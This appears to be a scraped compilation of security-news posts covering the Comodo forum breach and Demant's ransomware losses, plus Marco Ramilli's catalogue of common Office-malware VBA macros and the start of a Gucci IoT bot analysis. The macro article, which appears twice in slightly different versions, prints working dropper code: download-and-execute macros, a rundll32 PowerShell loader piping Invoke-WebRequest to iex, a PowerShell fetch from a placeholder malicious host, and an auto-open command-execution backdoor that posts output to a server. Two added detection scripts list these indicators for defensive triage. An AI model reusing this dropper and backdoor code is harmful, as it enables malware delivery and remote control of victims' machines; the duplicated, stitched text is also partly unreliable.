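            hits.append((m.group("ip"), m.group("method"), verdict, m.group("status")))
    return hits


if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        with open(sys.argv[1], encoding="utf-8", errors="replace") as fh:
            lines = fh.read().splitlines()
    else:
        lines = SAMPLE_LOG
    for ip, method, verdict, status in scan_log(lines):
        print(f"{verdict:16} {ip:16} {method:5} -> {status}")
```

A 200 on an "exploit_attempt" line is the signal to treat the host as compromised rather than merely probed; in the Comodo timeline above, that line would have been sitting in the logs for four days before the patch went on.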

Currently, Comodo operates two forums, “forums.comodo.com,” and ITarian Forum hosted at “forum.itarian.com,” the former runs on the Simple Machines Forum software, while the latter is based on vBulletin.

For this reason, the hackers likely breached the ITarian Forum, which Comodo customers use as a discussion board when looking for technical information and assistance.

“As a precautionary measure we recommend that forum users should immediately change their passwords and exercise good password practices such as strong random passwords and not share your passwords across different Internet accounts.” recommends Comodo. “The account passwords were encrypted in vBulletin for the Comodo Forum users, but a password change is recommended as part of good password practices.”

“We deeply regret any inconvenience or distress this vulnerability may have caused you, our users,” the company says.

Pierluigi Paganini

(SecurityAffairs – vBulletin, data breach)

The post Hackers breached one of Comodo Forums, 245,000 users impacted appeared first on Security Affairs.

Danish company Demant expects to incur losses of up to $95 million after cyber attack

Demant, a leading international hearing health care company, expects to incur losses of up to $95 million following a ransomware attack.

Last month, Demant suffered a cyber attack that seriously disrupted its operations; the company has yet to fully recover, a circumstance that suggests it was hit by ransomware.

Demant expects to incur losses of up to $95 million following the incident, a figure that is already net of $14.6 million in expected insurance coverage.

This places the incident among the costliest cyber attacks disclosed by a single company.

“The cyber-crime has had a significant impact on our ability to generate the growth we expected for the second half-year, and even though our commercial operations are doing their utmost to make up for the impact of the incident, we are in a situation where we cannot execute on our ambitious commercial growth activities to the planned extent. We are working around the clock to return to our growth-oriented business focus, while minimising the impact on customers and users of our products. We are grateful for the patience and loyalty shown, and the Demant organisation will continue to approach the incident with extreme dedication until we are completely recovered and have re-established what was severely disrupted by the incident,” says Søren Nielsen, President & CEO of Demant.

On September 3, Demant was forced to shut down its entire internal IT infrastructure following an act of “cyber-crime,” but the firm did not confirm a ransomware incident.

“As previously communicated in Company announcements on 3, 4 and 17 September, the Demant Group experienced a critical incident on our internal IT infrastructure on 3 September 2019. The Group’s IT infrastructure was hit by cyber-crime.” reads a message sent by the company to the investors.

“Our quick response to the issue by shutting down IT systems across multiple sites and business units contained and limited the issue, but key business processes throughout the value chain were nevertheless impacted by the incident, including R&D, production and distribution.”

The company published a statement that confirmed that a large portion of its infrastructure was impacted.

“It remains unclear whether it was a hacker attack that caused a critical crash in the IT infrastructure of the Danish company Demant on Tuesday evening.” reported Computerworld.

“But there are many indications that it could be a ransomware attack that has hit the company, according to security expert Jens Monrad, who is a daily employee of IT security firm FireEye.”

The company reported “delays in the supply of products as well as an impact on our ability to receive orders.” The incident impacted production lines in Poland as well as production in Mexico.

Many clinics across the Demant network have not been able to provide their regular service to end users.

The impact is predominately related to the estimated lost sales and on the growth momentum.

“Approximately half of the estimated lost sales relates to our hearing aid wholesale business. The incident has prevented us from executing our ambitious growth activities in some of the most important months of the year – particularly in the US, which is our biggest market,” concludes Demant.

“A little less than half of the estimated lost sales relates to our retail business where a significant number of clinics have been unable to service end-users in a regular fashion. We estimate that our retail business will see the biggest impact in Australia, the US and Canada followed by the UK. The vast majority of our clinics are now fully operational, however, due to the effect of the incident on our ability to generate new appointments during September, we expect some lost sales in the next one or two months, which is also included in the current estimate.”

The incident matters because it demonstrates the potential impact of a cyber attack on an organization and urges companies to adopt the necessary countermeasures.

The massive NotPetya attack caused billions of dollars in losses to organizations worldwide; the shipping giant Maersk and the courier FedEx each incurred losses of over $300 million. In April, the aluminum producer Norsk Hydro estimated the cost of the cyber attack that hit the company in March at around $50 million.

Pierluigi Paganini

(SecurityAffairs – Demant, ransomware)

The post Danish company Demant expects to incur losses of up to $95 million after cyber attack appeared first on Security Affairs.

Frequent VBA Macros used in Office Malware

The malware expert Marco Ramilli collected a small set of VBA Macros widely re-used to “weaponize” Maldoc (Malware Document) in cyber attacks.

Nowadays one of the most frequent cybersecurity threats comes from malicious Office documents shipped over e-mail or instant messaging. Some analyzed examples include: Step By Step Office Dropper Dissection, Spreading CVS Malware over Google, Microsoft Powerpoint as Malware Dropper, MalHIDE, Info Stealing: a New Operation in the Wild, Advanced All in Memory CryptoWorm, etc. Many analyses over the past few years have shown that attackers love to re-use code: they prefer to modify, obfuscate and finally encrypt already known code rather than write new “attacking modules” from scratch. Hence the idea of collecting a small set of VBA macros widely re-used to “weaponize” maldocs (malicious documents) in contemporary cyber attacks.

Very frequently Office documents such as Microsoft Excel or Microsoft Word files are used as droppers. The core concept of a dropper is to download and execute a third-party payload (a second stage), and when you analyse an Office dropper you will often run into many layers of obfuscation. Obfuscation exists to make the analysis harder, but once you get past that stage you will probably see VBA code looking like the following.

Download And Execute an External Program

Private Sub DownloadAndExecute()
    Dim droppingURL As String
    Dim localPath As String
    Dim WinHttpReq As Object, oStream As Object
    Dim result As Integer
    
    droppingURL = "https://example.com/mal.exe"
    localPath = "c://asd.exe"
    
    Set WinHttpReq = CreateObject("MSXML2.ServerXMLHTTP")
    WinHttpReq.setOption(2) = 13056 ' Ignore cert errors
    WinHttpReq.Open "GET", droppingURL, False ', "username", "password"
    WinHttpReq.setRequestHeader "User-Agent", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
    WinHttpReq.Send
    
    If WinHttpReq.Status = 200 Then
        Set oStream = CreateObject("ADODB.Stream")
        oStream.Open
        oStream.Type = 1
        oStream.Write WinHttpReq.ResponseBody
        oStream.SaveToFile localPath, 2  ' 1 = no overwrite, 2 = overwrite (will not work with file attrs)
        oStream.Close
        CreateObject("WScript.Shell").Run localPath, 0
    End If    
    
End Sub

The main idea behind this function (or sub-routine) is to use the ServerXMLHTTP object to download a file from an external resource, save it to a local directory (through the ADODB.Stream object) and finally execute it through the WScript.Shell object. The setOption(2) = 13056 line is worth noting during analysis: option 2 of ServerXMLHTTP selects which server certificate errors are ignored, and 13056 (0x3300) ignores all of them, so the dropper keeps working against a staging host with a self-signed or mismatched certificate. You might find variants of this behaviour, for example checks on the system language to target specific countries, or checks for an already infected machine, such as skipping the network traffic if the file is already present at localPath. A very common way to add this infection control on the same victim is to add the following check before the HTTP request.

If Dir(localPath, vbHidden + vbSystem) = "" Then

Another very common way to weaponize Office files is to download and execute a DLL instead of an executable. In that case the exported DLL function can be invoked directly from the VBA code, as follows.

Drop And Execute External DLL

Private Sub DropAndRunDll()
    Dim dll_Loc As String
    ' Drop into a directory that already exists under the user's profile
    dll_Loc = Environ("AppData") & "\Microsoft\Office"
    If Dir(dll_Loc, vbDirectory) = vbNullString Then
        Exit Sub
    End If
    
    VBA.ChDir dll_Loc
    VBA.ChDrive "C"
    
    'Download DLL
    Dim dll_URL As String
    dll_URL = "https://example.com/mal.dll"

    Dim WinHttpReq As Object
    Set WinHttpReq = CreateObject("MSXML2.ServerXMLHTTP.6.0")
    WinHttpReq.Open "GET", dll_URL, False
    WinHttpReq.send

    If WinHttpReq.Status = 200 Then
        Dim oStream As Object
        Set oStream = CreateObject("ADODB.Stream")
        oStream.Open
        oStream.Type = 1
        oStream.Write WinHttpReq.responseBody
        oStream.SaveToFile "Saved.asd", 2   ' lands in dll_Loc (current directory); the extension hides that it is a DLL
        oStream.Close

        ' Placeholder for the call into the dropped DLL (real samples bind an export with a Declare statement)
        ModuleExportedInDLL.Invoke
    End If
End Sub

Running a DLL or an external PE is not the only way to run code on the victim machine: PowerShell can be used as well. A nice way to execute PowerShell without direct access to PowerShell.exe is through its DLLs; the PowerShdll project makes this possible, for example in the following way. The DLL is fetched with the same ServerXMLHTTP/ADODB.Stream pattern seen above, then launched through rundll32, and here the process is spawned with a WMI Win32_Process.Create call rather than through WScript.Shell.

Dropping and Executing PowerShell

Sub RunDLL()
    DownloadDLL
    Dim Str As String
    ' rundll32 loads PowerShdll and runs the pipeline; "YouWish" is a placeholder URL
    Str = "C:\Windows\System32\rundll32.exe " & Environ("TEMP") & "\powershdll.dll,main . { Invoke-WebRequest -useb ""YouWish"" } ^| iex;"
    strComputer = "."
    ' Spawn the process through WMI instead of Shell/WScript.Shell
    Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
    Set objStartup = objWMIService.Get("Win32_ProcessStartup")
    Set objConfig = objStartup.SpawnInstance_
    Set objProcess = GetObject("winmgmts:\\" & strComputer & "\root\cimv2:Win32_Process")
    errReturn = objProcess.Create(Str, Null, objConfig, intProcessID)
End Sub


Sub DownloadDLL()
    Dim dll_Local As String
    dll_Local = Environ("TEMP") & "\powershdll.dll"
    If Not Dir(dll_Local, vbDirectory) = vbNullString Then
        Exit Sub
    End If
    
    Dim dll_URL As String
    #If Win64 Then
        dll_URL = "https://github.com/p3nt4/PowerShdll/raw/master/dll/bin/x64/Release/PowerShdll.dll"
    #Else
        dll_URL = "https://github.com/p3nt4/PowerShdll/raw/master/dll/bin/x86/Release/PowerShdll.dll"
    #End If
    
    Dim WinHttpReq As Object
    Set WinHttpReq = CreateObject("MSXML2.ServerXMLHTTP.6.0")
    WinHttpReq.Open "GET", dll_URL, False
    WinHttpReq.send

    myURL = WinHttpReq.responseBody
    If WinHttpReq.Status = 200 Then
        Set oStream = CreateObject("ADODB.Stream")
        oStream.Open
        oStream.Type = 1
        oStream.Write WinHttpReq.responseBody
        oStream.SaveToFile dll_Local
        oStream.Close
    End If
End Sub

Or, if you have direct access to PowerShell.exe, you might use a simple inline script like the following one. This is quite common in today’s Office droppers as well.

Simple PowerShell Drop and Execute External Program

powershell  (New-Object System.Net.WebClient).DownloadFile('http://malicious.host:5000/payload.exe','microsoft.exe');Start-Process 'microsoft.exe';exit;

By combining those techniques (HTTP requests and command execution) you can run commands on the victim machine, such as having a backdoor. I actually saw this code a few times in manual attacks back in 2017. The code below comes from the great work made by sevagas.


Dim serverUrl As String ' Auto generate at startup

Sub Workbook_Open()
    Main
End Sub

Sub AutoOpen()
    Main
End Sub

Private Sub Main()
    Dim msg As String
    serverUrl = "<<<TEMPLATE>>>"
    msg = "<<<TEMPLATE>>>"
    On Error GoTo byebye
    msg = PlayCmd(msg)
    SendResponse msg
    On Error GoTo 0
byebye:
End Sub

'Send data using http post'
'Note:
'WinHttpRequestOption_SslErrorIgnoreFlags, // 4
' See https://msdn.microsoft.com/en-us/library/windows/desktop/aa384108(v=vs.85).aspx'
Private Function HttpPostData(URL As String, data As String)
    'data must have form "var1=value1&var2=value2&var3=value3"'
    Dim objHTTP As Object
    Set objHTTP = CreateObject("WinHttp.WinHttpRequest.5.1")
    objHTTP.Option(4) = 13056 ' Ignore cert errors because self signed cert
    objHTTP.Open "POST", URL, False
    objHTTP.setRequestHeader "User-Agent", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
    objHTTP.setRequestHeader "Content-type", "application/x-www-form-urlencoded"
    objHTTP.SetTimeouts 2000, 2000, 2000, 2000
    objHTTP.send (data)
    HttpPostData = objHTTP.responseText
End Function

' Returns target ID'
Private Function GetId() As String
    Dim myInfo As String
    Dim myID As String
    myID = Environ("COMPUTERNAME") & " " & Environ("OS")
    GetId = myID
End Function

'To send response for command'
Private Function SendResponse(cmdOutput)
    Dim data As String
    Dim response As String
    data = "id=" & GetId & "&cmdOutput=" & cmdOutput
    SendResponse = HttpPostData(serverUrl, data)
End Function

' Play and return output any command line
Private Function PlayCmd(sCmd As String) As String
    'Run a shell command, returning the output as a string'
    ' Using a hidden window, pipe the output of the command to the CLIP.EXE utility...
    ' Necessary because normal usage with oShell.Exec("cmd.exe /C " & sCmd) always pops a windows
    Dim instruction As String
    instruction = "cmd.exe /c " & sCmd & " | clip"
    CreateObject("WScript.Shell").Run instruction, 0, True
    ' Read the clipboard text using htmlfile object
    PlayCmd = CreateObject("htmlfile").ParentWindow.ClipboardData.GetData("text")
End Function

You will probably never see this code exactly as described here, but you will likely find many similarities with the macros you are analysing, or will analyse, in your next maldoc analyses. Just remember that, on one hand, attackers love to re-use code, but on the other hand they really like to customize it. In your next VBA macro analysis keep these stereotypes in mind and speed up your analysis.
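A small triage script, added for this page and not taken from Marco Ramilli's post or from macro_pack, that turns the stereotypes catalogued above into regex indicators and a verdict. It is meant to run on VBA that has already been deobfuscated, for example the output of olevba. The first sample is the article's DownloadAndExecute macro with an AutoOpen trigger added so the entry-point check fires; the benign macro is constructed.

```python
import re
from typing import Dict, List, Tuple

# Stereotypes from the article as (category, regex) pairs: entry points, HTTP
# download objects, the certificate-error bypass, file drop, execution, recon, DLLs.
INDICATORS: List[Tuple[str, str]] = [
    ("autoexec",   r"\b(?:AutoOpen|Auto_Open|AutoExec|Workbook_Open|Document_Open)\b"),
    ("download",   r"MSXML2\.(?:Server)?XMLHTTP|WinHttp\.WinHttpRequest|Microsoft\.XMLHTTP"),
    ("download",   r"\bDownloadFile\b|Invoke-WebRequest|\biwr\b"),
    ("tls-bypass", r"setOption\s*\(\s*2\s*\)\s*=|\.Option\s*\(\s*4\s*\)\s*="),
    ("drop",       r"ADODB\.Stream|\bSaveToFile\b"),
    ("execute",    r"WScript\.Shell|\bShell\s*\(|Win32_Process\b|rundll32|powershell|\biex\b"),
    ("recon",      r'Environ\s*\(\s*"(?:COMPUTERNAME|OS|USERNAME|TEMP|AppData)"|ClipboardData'),
    ("dll",        r"\bDeclare\s+(?:PtrSafe\s+)?Function\b|\.dll\b"),
]

# The article's first macro, plus an AutoOpen trigger (sample input for this script).
SAMPLE_DROPPER = r'''
Sub AutoOpen()
    DownloadAndExecute
End Sub

Private Sub DownloadAndExecute()
    Dim droppingURL As String, localPath As String
    Dim WinHttpReq As Object, oStream As Object
    droppingURL = "https://example.com/mal.exe"
    localPath = "c://asd.exe"
    Set WinHttpReq = CreateObject("MSXML2.ServerXMLHTTP")
    WinHttpReq.setOption(2) = 13056
    WinHttpReq.Open "GET", droppingURL, False
    WinHttpReq.Send
    If WinHttpReq.Status = 200 Then
        Set oStream = CreateObject("ADODB.Stream")
        oStream.Open
        oStream.Type = 1
        oStream.Write WinHttpReq.ResponseBody
        oStream.SaveToFile localPath, 2
        oStream.Close
        CreateObject("WScript.Shell").Run localPath, 0
    End If
End Sub
'''

# Constructed benign macro: touches only the workbook.
SAMPLE_BENIGN = r'''
Sub FormatReport()
    Range("A1:D1").Font.Bold = True
    Columns("A:D").AutoFit
End Sub
'''


def scan_vba(source: str) -> Dict[str, List[str]]:
    """Map category -> distinct matched strings found in (deobfuscated) VBA source."""
    hits: Dict[str, List[str]] = {}
    for category, pattern in INDICATORS:
        for match in re.finditer(pattern, source, re.IGNORECASE):
            bucket = hits.setdefault(category, [])
            if match.group(0) not in bucket:
                bucket.append(match.group(0))
    return hits


def triage(source: str) -> Tuple[str, Dict[str, List[str]]]:
    """Verdict from the combination of indicators, mirroring the dropper pattern in the
    article: fetch over HTTP, write to disk (or load a DLL), then execute."""
    hits = scan_vba(source)
    cats = set(hits)
    if "download" in cats and "execute" in cats and ("drop" in cats or "dll" in cats):
        verdict = "dropper"
    elif "download" in cats and "execute" in cats:
        verdict = "download-and-execute"
    elif "execute" in cats:
        verdict = "runs-commands"
    else:
        verdict = "no-stereotype"
    return verdict, hits


if __name__ == "__main__":
    import sys
    source = open(sys.argv[1], encoding="utf-8", errors="replace").read() if len(sys.argv) > 1 else SAMPLE_DROPPER
    verdict, hits = triage(source)
    print("verdict:", verdict)
    for category, matches in hits.items():
        print(f"  {category:10} {', '.join(matches)}")
```

The verdict is only as good as the deobfuscation that precedes it: on a still-obfuscated macro the indicators mostly live inside string concatenations and Chr() calls, which is exactly why the author recommends peeling those layers first.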

Nowadays one of the most frequent cybersecurity threat comes from Malicious (office) document shipped over eMail or Instant Messaging. Some analyzed threats examples include: Step By Step Office Dropper DissectionSpreading CVS Malware over GoogleMicrosoft Powerpoint as Malware DropperMalHIDEInfo Stealing: a New Operation in the WildAdvanced All in Memory CryptoWorm, etc. Many analyses over the past few years taught that attackers love re-used code and they prefer to modify, obfuscate and finally encrypt already known code rather than writing from scratch new “attacking modules”. Here comes the idea to collect a small set of VBA Macros widely re-used to “weaponize” Maldoc (Malware Document) in contemporary cyber attacks.

Very frequently Office documents such as Microsoft Excel or Microsoft Doc are used as droppers. The core concept of a dropper is to Download and to Execute a third party payload (or a second stage) and often when you analyse Office dropper you would experience many layers of obfuscation. Obfuscation comes to make the analysis harder and harder, but once you overcome that stage you would probably see a VBA code looking like the following one.

Download And Execute an External Program

Private Sub DownloadAndExecute()
    Dim droppingURL As String
    Dim localPath As String
    Dim WinHttpReq As Object, oStream As Object
    Dim result As Integer
    
    droppingURL = "https://example.com/mal.exe"
    localPath = "c://asd.exe"
    
    Set WinHttpReq = CreateObject("MSXML2.ServerXMLHTTP")
    WinHttpReq.setOption(2) = 13056 ' Ignore cert errors
    WinHttpReq.Open "GET", droppingURL, False ', "username", "password"
    WinHttpReq.setRequestHeader "User-Agent", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
    WinHttpReq.Send
    
    If WinHttpReq.Status = 200 Then
        Set oStream = CreateObject("ADODB.Stream")
        oStream.Open
        oStream.Type = 1
        oStream.Write WinHttpReq.ResponseBody
        oStream.SaveToFile localPath, 2  ' 1 = no overwrite, 2 = overwrite (will not work with file attrs)
        oStream.Close
        CreateObject("WScript.Shell").Run localPath, 0
    End If    
    
End Sub

The main idea behind this function (or sub-routine) is to invoke ServerXMLHTTP object to download a file from an external resource, to save it on local directory (ADODB.Stream object) and finally to execute it through the object WScript.Shell. You might find variants of this behavior, for example you might find controls over language to target specific countries or specific control on already infected machine, for example by avoiding network traffic if the file is already in the localPath. A possible very common way to add infection control on the same victim is, for example, by adding the following code before the HTTP request.

If Dir(localPath, vbHidden + vbSystem) = "" Then

Another very common way to weaponize Office files is to download and to execute a DLL instead of external file. In such a case we can invoke the exported DLL function directly from the VBA code as follows.

Drop And Execute External DLL

Private Sub DropAndRunDll()
    Dim dll_Loc As String
    dll_Loc = Environ("AppData") & "\Microsoft\Office"
    If Dir(dll_Loc, vbDirectory) = vbNullString Then
        Exit Sub
    End If
    
    VBA.ChDir dll_Loc
    VBA.ChDrive "C"
    
    'Download DLL
    Dim dll_URL As String
    dll_URL = "https://example.com/mal.dll"

    Dim WinHttpReq As Object
    Set WinHttpReq = CreateObject("MSXML2.ServerXMLHTTP.6.0")
    WinHttpReq.Open "GET", dll_URL, False
    WinHttpReq.send

    myURL = WinHttpReq.responseBody
    If WinHttpReq.Status = 200 Then
        Set oStream = CreateObject("ADODB.Stream")
        oStream.Open
        oStream.Type = 1
        oStream.Write WinHttpReq.responseBody
        oStream.SaveToFile "Saved.asd", 2
        oStream.Close

        ModuleExportedInDLL.Invoke 
    End If
End Sub

Running DLL and External PE is not the only solution to run code on the victim machine, indeed we might use Powershell as well ! A nice way to execute PowerShell without direct access to PowerShell.exe is by using its DLLs, thanks to PowerShdll project this is possible, for example, in the following way

Dropping and Executing PowerShell

Sub RunDLL()
    DownloadDLL
    Dim Str As String
    Str = "C:\Windows\System32\rundll32.exe " & Environ("TEMP") & "\powershdll.dll,main . { Invoke-WebRequest -useb "YouWish" } ^| iex;"
    strComputer = "."
    Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
    Set objStartup = objWMIService.Get("Win32_ProcessStartup")
    Set objConfig = objStartup.SpawnInstance_
    Set objProcess = GetObject("winmgmts:\\" & strComputer & "\root\cimv2:Win32_Process")
    errReturn = objProcess.Create(Str, Null, objConfig, intProcessID)
End Function


Sub DownloadDLL()
    Dim dll_Local As String
    dll_Local = Environ("TEMP") & "\powershdll.dll"
    ' Skip the download if the DLL has already been dropped
    If Not Dir(dll_Local, vbDirectory) = vbNullString Then
        Exit Sub
    End If

    ' Pick the build that matches the Office bitness
    Dim dll_URL As String
    #If Win64 Then
        dll_URL = "https://github.com/p3nt4/PowerShdll/raw/master/dll/bin/x64/Release/PowerShdll.dll"
    #Else
        dll_URL = "https://github.com/p3nt4/PowerShdll/raw/master/dll/bin/x86/Release/PowerShdll.dll"
    #End If

    Dim WinHttpReq As Object
    Set WinHttpReq = CreateObject("MSXML2.ServerXMLHTTP.6.0")
    WinHttpReq.Open "GET", dll_URL, False
    WinHttpReq.send

    If WinHttpReq.Status = 200 Then
        ' Write the raw response body to disk (Type 1 = adTypeBinary, 2 = adSaveCreateOverWrite)
        Dim oStream As Object
        Set oStream = CreateObject("ADODB.Stream")
        oStream.Open
        oStream.Type = 1
        oStream.Write WinHttpReq.responseBody
        oStream.SaveToFile dll_Local, 2
        oStream.Close
    End If
End Sub

Or if you have direct access to PowerShell.exe you might use a simple inline script as the following one. This is quite common in today’s Office droppers as well.

Simple PowerShell Drop and Execute External Program

powershell  (New-Object System.Net.WebClient).DownloadFile('http://malicious.host:5000/payload.exe','microsoft.exe');Start-Process 'microsoft.exe';exit;

By combining those techniques (HTTP download and command execution) you might decide to run commands on the victim machine, for example to keep a backdoor. I actually saw this code a few times in manual attacks back in 2017. The code below comes from the great work made by sevagas.


Dim serverUrl As String

' Auto generate at startup
Sub Workbook_Open()
    Main
End Sub

Sub AutoOpen()
    Main
End Sub

Private Sub Main()
    Dim msg As String
    serverUrl = "<<<TEMPLATE>>>"
    msg = "<<<TEMPLATE>>>"
    On Error GoTo byebye
    msg = PlayCmd(msg)
    SendResponse msg
    On Error GoTo 0
byebye:
End Sub

' Send data using HTTP POST
' Note: WinHttpRequestOption_SslErrorIgnoreFlags = 4
' See https://msdn.microsoft.com/en-us/library/windows/desktop/aa384108(v=vs.85).aspx
Private Function HttpPostData(URL As String, data As String)
    ' data must have the form "var1=value1&var2=value2&var3=value3"
    Dim objHTTP As Object
    Set objHTTP = CreateObject("WinHttp.WinHttpRequest.5.1")
    objHTTP.Option(4) = 13056 ' Ignore cert errors because of the self-signed cert
    objHTTP.Open "POST", URL, False
    objHTTP.setRequestHeader "User-Agent", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
    objHTTP.setRequestHeader "Content-type", "application/x-www-form-urlencoded"
    objHTTP.SetTimeouts 2000, 2000, 2000, 2000
    objHTTP.send (data)
    HttpPostData = objHTTP.responseText
End Function

' Returns target ID
Private Function GetId() As String
    Dim myID As String
    myID = Environ("COMPUTERNAME") & " " & Environ("OS")
    GetId = myID
End Function

' Send the response for a command
Private Function SendResponse(cmdOutput)
    Dim data As String
    data = "id=" & GetId & "&cmdOutput=" & cmdOutput
    SendResponse = HttpPostData(serverUrl, data)
End Function

' Run any command line and return its output
Private Function PlayCmd(sCmd As String) As String
    ' Run a shell command, returning the output as a string.
    ' Using a hidden window, pipe the output of the command to the CLIP.EXE utility...
    ' Necessary because normal usage with oShell.Exec("cmd.exe /C " & sCmd) always pops a window
    Dim instruction As String
    instruction = "cmd.exe /c " & sCmd & " | clip"
    CreateObject("WScript.Shell").Run instruction, 0, True
    ' Read the clipboard text using the htmlfile object
    PlayCmd = CreateObject("htmlfile").ParentWindow.ClipboardData.GetData("text")
End Function

You will probably never see exactly the code described here, but you will likely find many similarities with the macros you are analysing, or will analyse, in your next MalDoc analyses. Just remember that on one hand attackers love to re-use code, but on the other hand they really like to customize it. In your next VBA macro analysis keep these stereotypes in mind and speed up your analysis.
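As an added example (not code from the original post, from macro_pack or from any of the macros above), the following Python script turns the stereotypes just described into a first-pass triage of extracted VBA source, such as the output of olevba: auto-exec entry points, an HTTP client object, a binary drop through ADODB.Stream, process creation through WMI or WScript.Shell, a living-off-the-land binary such as rundll32, an inline PowerShell download-and-execute, HTTP POST exfiltration, clipboard harvesting and host fingerprinting. The pattern names, the weights, the verdict thresholds and both sample macros are assumptions constructed for the example.

```python
import re
from collections import defaultdict

# Stereotypes drawn from the macro fragments discussed above.
# The weights are an editorial assumption, not a scheme from the original post.
STEREOTYPES = [
    ("autoexec", r"\b(AutoOpen|Auto_Open|Workbook_Open|Document_Open)\b", 1),
    ("http_client", r"MSXML2\.(Server)?XMLHTTP|WinHttp\.WinHttpRequest", 2),
    ("file_drop", r"ADODB\.Stream|\.SaveToFile\b", 2),
    ("wmi_exec", r"winmgmts:|Win32_Process", 3),
    ("shell_exec", r"WScript\.Shell|\bShell\s*\(", 3),
    ("lolbin", r"\b(rundll32|regsvr32|mshta|certutil|powershell)(\.exe)?\b", 3),
    ("ps_download_exec", r"Invoke-WebRequest|DownloadString|DownloadFile|\biex\b", 3),
    ("http_post", r"\"POST\"|x-www-form-urlencoded", 2),
    ("clipboard_read", r"ClipboardData\.GetData|\|\s*clip\b", 2),
    ("tls_check_bypass", r"\.Option\(\s*4\s*\)\s*=", 2),
    ("host_fingerprint", r"Environ\(\s*\"(COMPUTERNAME|OS|USERNAME)\"\s*\)", 1),
]
_COMPILED = [(tag, re.compile(rx, re.I), w) for tag, rx, w in STEREOTYPES]
_URL = re.compile(r"https?://[^\s\"'<>]+", re.I)


def triage(vba_source: str) -> dict:
    """Scan VBA source line by line.

    Returns the matched stereotypes with their line numbers, a score that
    counts each stereotype once, and any URLs found (candidate IOCs).
    """
    hits = defaultdict(list)
    score = 0
    for lineno, line in enumerate(vba_source.splitlines(), start=1):
        if line.lstrip().startswith("'"):
            continue  # whole-line VBA comment
        for tag, rx, weight in _COMPILED:
            if rx.search(line):
                if not hits[tag]:
                    score += weight
                hits[tag].append(lineno)
    return {"hits": dict(hits), "score": score,
            "urls": sorted(set(_URL.findall(vba_source)))}


def verdict(score: int) -> str:
    """Coarse label; the thresholds are an assumption to tune on your own corpus."""
    if score >= 8:
        return "likely dropper/backdoor stereotype"
    if score >= 3:
        return "suspicious, review manually"
    return "no stereotype matched"


# Constructed sample: a download-and-rundll32 macro in the style discussed above.
SAMPLE_DROPPER = r'''
Sub AutoOpen()
    Dim req As Object, st As Object, proc As Object, pid As Long
    Set req = CreateObject("MSXML2.ServerXMLHTTP.6.0")
    req.Open "GET", "http://payload.example.invalid/p.dll", False
    req.send
    Set st = CreateObject("ADODB.Stream")
    st.Type = 1
    st.Write req.responseBody
    st.SaveToFile Environ("TEMP") & "\p.dll", 2
    Set proc = GetObject("winmgmts:\\.\root\cimv2:Win32_Process")
    proc.Create "rundll32.exe " & Environ("TEMP") & "\p.dll,main", Null, Null, pid
End Sub
'''

# Constructed sample: an ordinary formatting macro, for contrast.
SAMPLE_BENIGN = '''
Sub FormatReport()
    Worksheets("Summary").Range("A1:D1").Font.Bold = True
    Worksheets("Summary").Columns("A:D").AutoFit
End Sub
'''

if __name__ == "__main__":
    for label, src in (("dropper", SAMPLE_DROPPER), ("benign", SAMPLE_BENIGN)):
        r = triage(src)
        print(f"{label}: score={r['score']} ({verdict(r['score'])})")
        for tag, lines in r["hits"].items():
            print(f"  {tag:18} lines {lines}")
        for url in r["urls"]:
            print(f"  url: {url}")
```

The score deliberately counts each stereotype once, so a macro that downloads ten files is not rated ten times more suspicious than one that downloads one; what matters is the combination of fetch, drop and execute in the same module. Obfuscated macros that build these strings with Chr() or StrReverse will not match literally, which is exactly why the output is a starting point for manual analysis rather than a verdict on its own.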

The original post is available on Marco Ramilli’s blog:

About the author: Marco Ramilli, Founder of Yoroi

I am a computer security scientist with an intensive hacking background. I have an MD in computer engineering and a PhD in computer security from the University of Bologna. During my PhD program I worked for the US Government (at the National Institute of Standards and Technology, Security Division), where I did intensive research on malware evasion techniques and penetration testing of electronic voting systems.

I have experience in security testing, since I have been performing penetration testing on several US electronic voting systems. I have also been in charge of testing the uVote voting system for the Italian Ministry of Homeland Security. I met Palantir Technologies, where I was introduced to the intelligence ecosystem. I decided to amplify my cyber security experience by diving into SCADA security issues with some of the biggest industrial conglomerates in Italy. I finally decided to found Yoroi: an innovative Managed Cyber Security Service Provider developing some of the most amazing cyber security defence centers I have ever experienced! Now I technically lead Yoroi, defending our customers and strongly believing in: Defence Belongs To Humans

Pierluigi Paganini

(SecurityAffairs – VBA macros, Office malware)

The post Frequent VBA Macros used in Office Malware appeared first on Security Affairs.

Gucci IOT Bot Discovered Targeting European Region

Security Labs discovered a new IOT bot named “GUCCI”. It seems like the IOT botnet is named after an Italian luxury brand of fashion and leather goods.

Analysis

The discovery came about during our reconnaissance and intelligence collection process. The IoT threat detection engine picked up the infection IP shown below, which was hosting a number of binaries for different architectures.

Figure 1: GUCCI Bot Binaries

All the bins were successfully downloaded and magic headers were analyzed to check the type of file. Figure 2 highlights how the GUCCI bot binaries are compiled.

Figure 2:  Bot: compiled Binaries

As you can see from the output in Figure 2, all the Gucci bot binaries are “stripped”. This means that when these binaries were compiled the symbol table and debug symbols were removed from the executables, reducing their size and making reverse engineering harder. Listing 1 shows the MD5 hashes of the binaries analyzed.

MD5 (arm)  = b24e88da025e2e2519a96dd874e6ba8b
MD5 (arm5) = 24ef4178e365c902cfdd53d0ea0d1dc2
MD5 (arm6) = 5a5a27635570b2c3634cab62beadc951
MD5 (arm7) = c1ef67719e9762fc46aeb28a064fe0ae
MD5 (m68k) = 2b984677ab9ee264a2dae90ca994a2a6
MD5 (mips) = a0e0da3ae1ad1b94f0626c3e0cb311ad
MD5 (mpsl) = ee26f791f724f92c02d976b0c774290d
MD5 (ppc)  = e16f594cbdd7b82d74f9abc65e0fe677
MD5 (sh4)  = a70d246e911fe52638595ea97ed07342
MD5 (spc)  = d1b719ab9b7be08ea418b47492108dfa
MD5 (x86)  = de94d4718127959a494fe8fbc4aa5b2a

Listing 1: MD5 Hashes of the Gucci Bot Binaries
